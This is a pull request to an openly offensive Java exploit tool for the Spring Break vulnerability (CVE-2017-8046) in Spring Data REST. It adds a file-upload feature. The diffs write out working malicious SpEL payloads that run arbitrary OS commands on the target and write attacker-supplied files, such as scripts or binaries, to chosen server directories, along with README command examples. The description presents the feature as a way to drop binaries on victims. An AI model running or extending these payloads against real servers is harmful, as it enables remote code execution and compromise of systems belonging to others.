### PR TITLE
File upload functionality

### DIFF
--- a/README.md
+++ b/README.md
@@ -59,6 +59,12 @@ Options:
       You have to choose an existent resource.
    -cmd, --command [command_to_execute]
       The command that will be executed on the remote machine.
+   -U, --upload [file_to_upload]
+      File to upload to the remote machine. Will be uploaded to the current working
+      directory of the java process.
+   --remote-upload-directory [/some/existing/path/]
+      Optional. Server will attempt to write the uploaded file to this directory on the
+      filesystem. Specified directory must exist and be writeable.
    --cookies [cookies]
       Optional. Cookies passed into the request, e.g. authentication cookies.
    -H, --header [custom_header]
@@ -73,6 +79,7 @@ Options:
    -v, --verbose
       Optional. Increase verbosity.
 ```
+
 
 ## Examples
 

--- a/README.md
+++ b/README.md
@@ -85,6 +85,10 @@ java -jar spring-break_cve-2017-8046.jar --url "https://vuln02.foo.com/api/v2/en
 ```
 
 ```
+java -jar spring-break_cve-2017-8046.jar -v --url "https://vuln02.foo.com/api/v2/entity/42"  --upload file.sh --remote-upload-directory /tmp
+```
+
+```
 java -jar spring-break_cve-2017-8046.jar --url "https://vuln03.foo.com/asd/api/v1/entity/1" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"
 ```
 

--- a/pom.xml
+++ b/pom.xml
@@ -46,6 +46,19 @@
       <artifactId>httpclient</artifactId>
       <version>4.5.5</version>
     </dependency>
+
+      <!--
+      This dependency is used for file-handling (uploads). But it's a tradeoff. The options are:
+         a) write long and non-elegant filehandling-code manually without libraries and basic java-features
+         b) write readable code, no library, but sacrifice compatibility by using Java-1.7+ file-handling features
+         c) write short code, use this library and be Java-1.5+ compatible.
+      Option C was chosen:
+      -->
+    <dependency>
+      <groupId>commons-io</groupId>
+      <artifactId>commons-io</artifactId>
+      <version>2.6</version>
+    </dependency>
   </dependencies>
   <url>https://github.com/m3ssap0/spring-break_cve-2017-8046</url>
 </project>

--- a/pom.xml
+++ b/pom.xml
@@ -5,6 +5,10 @@
   <version>1.3</version>
   <name>spring-break_cve-2017-8046</name>
   <description>This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046).</description>
+  <properties>
+    <maven.compiler.source>1.7</maven.compiler.source>
+    <maven.compiler.target>1.7</maven.compiler.target>
+  </properties>
   <build>
     <sourceDirectory>src/main/java</sourceDirectory>
     <plugins>

--- a/src/main/java/com/afs/exploit/spring/SpringBreakCve20178046.java
+++ b/src/main/java/com/afs/exploit/spring/SpringBreakCve20178046.java
@@ -53,7 +53,7 @@ public class SpringBreakCve20178046 {
     /**
      * Version string.
      */
-    private static final String VERSION = "v1.4 (2018-10-12)";
+    private static final String VERSION = "v1.4 (2018-10-11)";
 
     /**
      * The JSON Patch object.
@@ -67,7 +67,7 @@ public class SpringBreakCve20178046 {
     private static String SLASH = "(new java.lang.String(new char[]{0x2F}))";
 
     /**
-     * Malicious SpEL-script for sending commands.
+     * Malicious SpEL-script for executing commands.
      */
     private static String COMMAND_PAYLOAD;
     static {
@@ -95,8 +95,9 @@ public class SpringBreakCve20178046 {
      */
     private static String FILEUPLOAD_PAYLOAD;
     static {
-        FILEUPLOAD_PAYLOAD += "T(java.nio.file.Files).write(";
-        FILEUPLOAD_PAYLOAD +=   "T(java.nio.file.Paths).get(\\\"%s\\\"),";
+        // classes java.nio.file.* are only available in Java7+..
+        FILEUPLOAD_PAYLOAD = "T(java.nio.file.Files).write(";
+        FILEUPLOAD_PAYLOAD +=   "T(java.nio.file.Paths).get(%s),";
         FILEUPLOAD_PAYLOAD +=   "T(java.util.Base64).getDecoder().decode(\\\"%s\\\")";
         FILEUPLOAD_PAYLOAD += ").x";
     }
@@ -158,10 +159,16 @@ public class SpringBreakCve20178046 {
 
     /**
      * Path that will point to a file on the local filesystem, which will
-     * be uploaded. Uploads cannot be used in conjuction with commands in the
+     * be uploaded. Uploads cannot be used in conjunction with commands in the
      * same request.
      */
     private File localFileToUpload;
+
+    /**
+     * Server will upload the file to this location, e.g. /tmp or C:\TEMP. This path
+     * will be encoded to ensure that Spring will not convert slashes to dots.
+     */
+    private String remoteUploadDirectory;
 
     /**
      * Default constructor.
@@ -210,6 +217,9 @@ public class SpringBreakCve20178046 {
             }
             if(this.localFileToUpload != null) {
                 System.out.println("[*] File to upload ....: " + this.localFileToUpload.getAbsolutePath());
+                if(!isEmpty(this.remoteUploadDirectory)){
+                    System.out.println("[*] Remote upload directory: " + this.remoteUploadDirectory);
+                }
             }
             System.out.println("[*] Cookies ...........: " + (isEmpty(this.cookies) ? "(no cookies)" : this.cookies));
             System.out.println("[*] Headers ...........: " + (this.customHeaders == null || this.customHeaders.isEmpty() ? "(no headers)" : "(" + this.customHeaders.size() + " headers)"));
@@ -243,12 +253,19 @@ public class SpringBreakCve20178046 {
         // upload a file to the server:
         else if(this.localFileToUpload != null){
             try {
+                //remote preparing filename / directory
+                String filename = this.localFileToUpload.getName();
+                if(remoteUploadDirectory!= null){
+                    filename = remoteUploadDirectory + filename;
+                    filename = encode(filename);
+                }
+
                 // reading filecontent to byte[] instead of string avoids potential text encoding issues
                 byte[] rawFileContent = FileUtils.readFileToByteArray(this.localFileToUpload);
                 String encodedFileContent = Base64.encodeBase64String(rawFileContent);
-                String filename = this.localFileToUpload.getName();
                 String maliciousSpEL = String.format(FILEUPLOAD_PAYLOAD, filename, encodedFileContent);
                 payload = String.format(JSON_PATCH_OBJECT, maliciousSpEL);
+
             } catch (IOException e) {
                 throw new RuntimeException(e);
             }
@@ -457,10 +474,17 @@ public class SpringBreakCve20178046 {
 
         File upload = new File(localFileToUpload);
         if(!upload.exists() || !upload.isFile() || !upload.canRead()){
-            throw new IllegalArgumentException("File to upload must exist and be readable.");
+            throw new IllegalArgumentException("File to upload does not exist or is not readable: " + upload.getAbsolutePath());
         }
 
         this.localFileToUpload = upload;
+    }
+
+    public void setRemoteUploadDirectory(String remoteUploadDirectory) {
+        if(!remoteUploadDirectory.endsWith("/")){
+            remoteUploadDirectory += "/";
+        }
+        this.remoteUploadDirectory = remoteUploadDirectory;
     }
 
     /**
@@ -481,7 +505,10 @@ public class SpringBreakCve20178046 {
         System.out.println("      The command that will be executed on the remote machine.");
         System.out.println("   -U, --upload [file_to_upload]");
         System.out.println("      File to upload to the remote machine. Will be uploaded to the current working");
-        System.out.println("       directory of the java process.");
+        System.out.println("      directory of the java process.");
+        System.out.println("   --remote-upload-directory [/some/existing/path/]");
+        System.out.println("      Optional. Server will attempt to write the uploaded file to this directory on the");
+        System.out.println("      filesystem. Specified directory must exist and be writeable.");
         System.out.println("   --cookies [cookies]");
         System.out.println("      Optional. Cookies passed into the request, e.g. authentication cookies.");
         System.out.println("   -H, --header [custom_header]");
@@ -527,7 +554,12 @@ public class SpringBreakCve20178046 {
                         if (i + 1 > args.length - 1) {
                             throw new IllegalArgumentException("File must be passed, if specified.");
                         }
-                        o.setLocalFileToUpload(p.trim());
+                        o.setLocalFileToUpload(args[++i].trim());
+                    } else if("--remote-upload-directory".equals(p)) {
+                        if (i + 1 > args.length - 1) {
+                            throw new IllegalArgumentException("Remote directory must be passed, if specified.");
+                        }
+                        o.setRemoteUploadDirectory(args[++i].trim());
                     } else if ("-cmd".equals(p) || "--command".equals(p)) {
 
                         if (i + 1 > args.length - 1) {

--- a/src/main/java/com/afs/exploit/spring/SpringBreakCve20178046.java
+++ b/src/main/java/com/afs/exploit/spring/SpringBreakCve20178046.java
@@ -218,7 +218,7 @@ public class SpringBreakCve20178046 {
             if(this.localFileToUpload != null) {
                 System.out.println("[*] File to upload ....: " + this.localFileToUpload.getAbsolutePath());
                 if(!isEmpty(this.remoteUploadDirectory)){
-                    System.out.println("[*] Remote upload directory: " + this.remoteUploadDirectory);
+                    System.out.println("[*] Remote upload dir .: " + this.remoteUploadDirectory);
                 }
             }
             System.out.println("[*] Cookies ...........: " + (isEmpty(this.cookies) ? "(no cookies)" : this.cookies));

--- a/src/main/java/com/afs/exploit/spring/SpringBreakCve20178046.java
+++ b/src/main/java/com/afs/exploit/spring/SpringBreakCve20178046.java
@@ -505,7 +505,8 @@ public class SpringBreakCve20178046 {
         System.out.println("      The command that will be executed on the remote machine.");
         System.out.println("   -U, --upload [file_to_upload]");
         System.out.println("      File to upload to the remote machine. Will be uploaded to the current working");
-        System.out.println("      directory of the java process.");
+        System.out.println("      directory of the java process. Warning; this will only succeed on a server running");
+        System.out.println("      JRE-1.7 or later.");
         System.out.println("   --remote-upload-directory [/some/existing/path/]");
         System.out.println("      Optional. Server will attempt to write the uploaded file to this directory on the");
         System.out.println("      filesystem. Specified directory must exist and be writeable.");

--- a/src/main/java/com/afs/exploit/spring/SpringBreakCve20178046.java
+++ b/src/main/java/com/afs/exploit/spring/SpringBreakCve20178046.java
@@ -14,6 +14,7 @@
 package com.afs.exploit.spring;
 
 import java.io.BufferedReader;
+import java.io.File;
 import java.io.IOException;
 import java.io.InputStreamReader;
 import java.net.URI;
@@ -21,12 +22,15 @@ import java.net.URISyntaxException;
 import java.util.ArrayList;
 import java.util.List;
 
+import org.apache.commons.io.FileUtils;
 import org.apache.http.HttpResponse;
 import org.apache.http.client.HttpClient;
 import org.apache.http.client.methods.HttpPatch;
 import org.apache.http.entity.StringEntity;
 import org.apache.http.impl.client.HttpClientBuilder;
 
+
+import org.apache.commons.codec.binary.Base64;
 /**
  * This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046).
  * This software is written to have as less external dependencies as possible.
@@ -37,7 +41,7 @@ import org.apache.http.impl.client.HttpClientBuilder;
  * . CVE-ID ........: CVE-2017-8046
  * . Link ..........: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
  * . Description ...: Malicious PATCH requests submitted to spring-data-rest servers in Pivotal Spring Data REST
- * .................. versions prior to 2.5.12, 2.6.7, 3.0 RC3, Spring Boot versions prior to 2.0.0M4, and Spring
+ * .................. versions prior to 2.5.12, 2.6.9, 3.0 RC3, Spring Boot versions prior to 2.0.0M4, and Spring
  * .................. Data release trains prior to Kay-RC3 can use specially crafted JSON data to run arbitrary
  * .................. Java code.
  * ..................
@@ -49,7 +53,7 @@ public class SpringBreakCve20178046 {
     /**
      * Version string.
      */
-    private static final String VERSION = "v1.3 (2018-04-07)";
+    private static final String VERSION = "v1.4 (2018-10-12)";
 
     /**
      * The JSON Patch object.
@@ -63,30 +67,40 @@ public class SpringBreakCve20178046 {
     private static String SLASH = "(new java.lang.String(new char[]{0x2F}))";
 
     /**
-     * Malicious payload.
+     * Malicious SpEL-script for sending commands.
      */
-    private static String PAYLOAD;
+    private static String COMMAND_PAYLOAD;
+    static {
+        COMMAND_PAYLOAD = "T(org.springframework.util.StreamUtils).copy(";
+        COMMAND_PAYLOAD += "T(java.lang.Runtime).getRuntime().exec(";
+        COMMAND_PAYLOAD += "(";
+        COMMAND_PAYLOAD += "T(java.lang.System).getProperty(\\\"os.name\\\").toLowerCase().contains(\\\"win\\\")";
+        COMMAND_PAYLOAD += "?";
+        COMMAND_PAYLOAD += "\\\"cmd \\\"+" + SLASH + "+\\\"c \\\"";
+        COMMAND_PAYLOAD += ":";
+        COMMAND_PAYLOAD += "\\\"\\\"";
+        COMMAND_PAYLOAD += ")+";
+        COMMAND_PAYLOAD += "%s"; // The encoded command will be placed here.
+        COMMAND_PAYLOAD += ").get%sStream()";
+        COMMAND_PAYLOAD += ",";
+        COMMAND_PAYLOAD += "T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes()";
+        COMMAND_PAYLOAD += ".getResponse().getOutputStream()";
+        COMMAND_PAYLOAD += ").x";
+    }
+
 
     /**
-     * Malicious payload initialization.
+     * Malicious SpEL-script for uploading files (like scripts, binaries, etc).
+     *
      */
+    private static String FILEUPLOAD_PAYLOAD;
     static {
-        PAYLOAD = "T(org.springframework.util.StreamUtils).copy(";
-        PAYLOAD += "T(java.lang.Runtime).getRuntime().exec(";
-        PAYLOAD += "(";
-        PAYLOAD += "T(java.lang.System).getProperty(\\\"os.name\\\").toLowerCase().contains(\\\"win\\\")";
-        PAYLOAD += "?";
-        PAYLOAD += "\\\"cmd \\\"+" + SLASH + "+\\\"c \\\"";
-        PAYLOAD += ":";
-        PAYLOAD += "\\\"\\\"";
-        PAYLOAD += ")+";
-        PAYLOAD += "%s"; // The encoded command will be placed here.
-        PAYLOAD += ").get%sStream()";
-        PAYLOAD += ",";
-        PAYLOAD += "T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes()";
-        PAYLOAD += ".getResponse().getOutputStream()";
-        PAYLOAD += ").x";
+        FILEUPLOAD_PAYLOAD += "T(java.nio.file.Files).write(";
+        FILEUPLOAD_PAYLOAD +=   "T(java.nio.file.Paths).get(\\\"%s\\\"),";
+        FILEUPLOAD_PAYLOAD +=   "T(java.util.Base64).getDecoder().decode(\\\"%s\\\")";
+        FILEUPLOAD_PAYLOAD += ").x";
     }
+
 
     /**
      * Error cause string that can be used to "clean the response."
@@ -141,6 +155,14 @@ public class SpringBreakCve20178046 {
      */
     private List<String> customHeaders = new ArrayList<String>();
 
+
+    /**
+     * Path that will point to a file on the local filesystem, which will
+     * be uploaded. Uploads cannot be used in conjuction with commands in the
+     * same request.
+     */
+    private File localFileToUpload;
+
     /**
      * Default constructor.
      */
@@ -172,8 +194,8 @@ public class SpringBreakCve20178046 {
             throw new IllegalArgumentException("URL must be passed.");
         }
 
-        if (isEmpty(this.command)) {
-            throw new IllegalArgumentException("Command must be passed.");
+        if (isEmpty(this.command) && this.localFileToUpload == null) {
+            throw new IllegalArgumentException("Either a command must be passed, or a file must be selected for upload.");
         }
     }
 
@@ -183,7 +205,12 @@ public class SpringBreakCve20178046 {
     private void printInput() {
         if (isVerbose()) {
             System.out.println("[*] Target URL ........: " + this.url);
-            System.out.println("[*] Command ...........: " + this.command);
+            if(!isEmpty(this.command)) {
+                System.out.println("[*] Command ...........: " + this.command);
+            }
+            if(this.localFileToUpload != null) {
+                System.out.println("[*] File to upload ....: " + this.localFileToUpload.getAbsolutePath());
+            }
             System.out.println("[*] Cookies ...........: " + (isEmpty(this.cookies) ? "(no cookies)" : this.cookies));
             System.out.println("[*] Headers ...........: " + (this.customHeaders == null || this.customHeaders.isEmpty() ? "(no headers)" : "(" + this.customHeaders.size() + " headers)"));
             if (this.customHeaders != null && !this.customHeaders.isEmpty()) {
@@ -204,10 +231,28 @@ public class SpringBreakCve20178046 {
      */
     private String preparePayload() {
         System.out.println("[*] Preparing payload.");
+        String payload = null;
 
-        String command = encodingCommand(); // Encoding inserted command.
-        String payload = String.format(PAYLOAD, command, isErrorStream() ? ERROR_STREAM : INPUT_STREAM); // Preparing Java payload.
-        payload = String.format(JSON_PATCH_OBJECT, payload); // Placing payload into JSON Patch object.
+        // send a command to the server:
+        if(!isEmpty(this.command)) {
+            String encodedCommand = encode(this.command); // Encoding inserted command.
+            String maliciousSpEL = String.format(COMMAND_PAYLOAD, encodedCommand, isErrorStream() ? ERROR_STREAM : INPUT_STREAM);
+            payload = String.format(JSON_PATCH_OBJECT, maliciousSpEL); // Placing payload into JSON Patch object.
+        }
+
+        // upload a file to the server:
+        else if(this.localFileToUpload != null){
+            try {
+                // reading filecontent to byte[] instead of string avoids potential text encoding issues
+                byte[] rawFileContent = FileUtils.readFileToByteArray(this.localFileToUpload);
+                String encodedFileContent = Base64.encodeBase64String(rawFileContent);
+                String filename = this.localFileToUpload.getName();
+                String maliciousSpEL = String.format(FILEUPLOAD_PAYLOAD, filename, encodedFileContent);
+                payload = String.format(JSON_PATCH_OBJECT, maliciousSpEL);
+            } catch (IOException e) {
+                throw new RuntimeException(e);
+            }
+        }
 
         if (isVerbose()) {
             System.out.println("[*] Payload ...........: " + payload);
@@ -221,12 +266,12 @@ public class SpringBreakCve20178046 {
      * 
      * @return The encoded command.
      */
-    private String encodingCommand() {
+    private String encode(String command) {
         StringBuffer encodedCommand = new StringBuffer("(new java.lang.String(new char[]{");
 
-        int commandLength = this.command.length();
+        int commandLength = command.length();
         for (int i = 0; i < commandLength; i++) {
-            encodedCommand.append((int) this.command.charAt(i));
+            encodedCommand.append((int) command.charAt(i));
             if (i + 1 < commandLength) {
                 encodedCommand.append(",");
             }
@@ -405,6 +450,19 @@ public class SpringBreakCve20178046 {
         this.errorStream = errorStream;
     }
 
+    public void setLocalFileToUpload(String localFileToUpload){
+        if(isEmpty(localFileToUpload)){
+            throw new IllegalArgumentException("Filename must not be null and not empty.");
+        }
+
+        File upload = new File(localFileToUpload);
+        if(!upload.exists() || !upload.isFile() || !upload.canRead()){
+            throw new IllegalArgumentException("File to upload must exist and be readable.");
+        }
+
+        this.localFileToUpload = upload;
+    }
+
     /**
      * Shows the program help.
      */
@@ -421,6 +479,9 @@ public class SpringBreakCve20178046 {
         System.out.println("      You have to choose an existent resource.");
         System.out.println("   -cmd, --command [command_to_execute]");
         System.out.println("      The command that will be executed on the remote machine.");
+        System.out.println("   -U, --upload [file_to_upload]");
+        System.out.println("      File to upload to the remote machine. Will be uploaded to the current working");
+        System.out.println("       directory of the java process.");
         System.out.println("   --cookies [cookies]");
         System.out.println("      Optional. Cookies passed into the request, e.g. authentication cookies.");
         System.out.println("   -H, --header [custom_header]");
@@ -462,6 +523,11 @@ public class SpringBreakCve20178046 {
                         }
                         o.setUrl(args[++i]);
 
+                    } else if("-U".equals(p) || "--upload".equals(p)) {
+                        if (i + 1 > args.length - 1) {
+                            throw new IllegalArgumentException("File must be passed, if specified.");
+                        }
+                        o.setLocalFileToUpload(p.trim());
                     } else if ("-cmd".equals(p) || "--command".equals(p)) {
 
                         if (i + 1 > args.length - 1) {


### PR DESCRIPTION
I've added file-upload functionality, which comes in very handy for uploading certain ... statically linked binaries. 

To avoid encoding issues, the script uses Base64 to convert byte-arrays to string (and back). It also leverages the existing encode-method to prevent Spring from removing slashes in the directory/filename. But since the malicious SpEL-script uses java.nio.file.* features, it will only succeed if the vulnerable server is running Java 1.7+. 

It certainly works like a charm, so I hope you like it. If you see improvements, please let me know.

Best regards,
Robin.